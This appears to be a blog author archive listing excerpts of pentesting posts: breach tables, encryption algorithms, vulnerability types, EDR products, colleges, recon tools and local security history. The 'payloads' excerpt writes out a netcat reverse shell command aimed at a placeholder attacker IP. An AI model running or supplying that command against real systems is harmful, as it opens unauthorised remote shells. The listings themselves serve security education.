Author: admin
-
17 Breaches – Internal Network Pentest Could Have Prevented
Date Company How Breached Company URL News Article 2013-12-19 Target Malware on Point-of-Sale systems Target Target Data Breach – CNBC 2014-09-02 Home Depot Malware in point-of-sale systems Home Depot Home Depot Confirms Breach – KrebsOnSecurity 2017-09-07 Equifax Exploited a vulnerability in website software Equifax Equifax Data Breach – The Guardian 2013-12-21 Adobe Cyber-attack, exposed user…
-
17 Encryption Algorithms In Network Pentests
This is a comprehensive list of the 17 top encryption algorithms found in network pentests. No. Encryption Algorithm URL Description 1 AES (Advanced Encryption Standard) NIST – AES AES is a symmetric encryption algorithm widely used for securing sensitive data. Its strength lies in its efficiency and security, making it a standard choice for various…
-
17 Potent Network Pentest Payloads
This post lists the 17 payloads found commonly in the wild. I also wrote a post on 17 of the most common vulnerabilities – here. Payload Description Usage Example URL Reverse Shell Establishes a connection from the target to the attacker, allowing remote control of the system. nc -e /bin/sh attacker_ip 1234 Reverse Shell Payload…
-
Key Vulnerabilities in Cyber:Network Pentest
Cyber Attack Abbreviation Description OWASP URL Cross-Site Scripting XSS Injecting malicious scripts into web pages viewed by users. Exploits vulnerabilities in web apps. OWASP XSS SQL Injection SQLi Targeting databases by inserting malicious SQL code into input fields. Can lead to data breaches. OWASP SQL Injection Cross-Site Request Forgery CSRF Tricking a user’s browser into…
-
Top Endpoint Detection and Response
17 top Endpoint Detection and Response (EDR) software solutions: EDR Software Description URL CrowdStrike Falcon CrowdStrike Falcon is a cloud-native EDR platform known for its real-time threat intelligence and endpoint protection capabilities, offering next-gen antivirus, endpoint detection, and response features. CrowdStrike Falcon Carbon Black (VMware Carbon Black Cloud) Now part of VMware, Carbon Black Cloud…
-
“Penetration Testing” Colleges: A Nice List
College Name Description URL Bentley University Offers a cybersecurity risk management certificate with diverse certification options, costing $9,900, emphasizing practical skills and inclusive career services. Bentley University Cybersecurity Bowie State University Provides graduate and bachelor’s degrees in computer science with a cybersecurity focus, recognized as a National Center of Academic Excellence. Bowie State Cybersecurity Butler…
-
Pentesting Recon: Navigating Footprints
Tool Name URL Description Nmap https://nmap.org/ Network scanning and host discovery tool. Recon-ng https://github.com/lanmaster53/recon-ng Full-featured reconnaissance framework. Shodan https://www.shodan.io/ Search engine for internet-connected devices. TheHarvester https://github.com/laramies/theHarvester Email and subdomain harvesting tool. Maltego https://www.maltego.com/ Interactive data mining and link analysis tool. SpiderFoot https://www.spiderfoot.net/ Open-source footprinting tool. OSINT Framework https://osintframework.com/ Collection of various OSINT tools. EyeWitness https://github.com/FortyNorthSecurity/EyeWitness…
-
Massachusetts Cybersecurity: MIT, LOPHT, and 2600
Massachusetts has long been a hub of technological innovation, and its influence in the field of cybersecurity is no exception, so if you’d like to know more, read on for more on the origins of Massachusetts cybersecurity. The state is home to renowned institutions like the Massachusetts Institute of Technology (MIT) and has played a…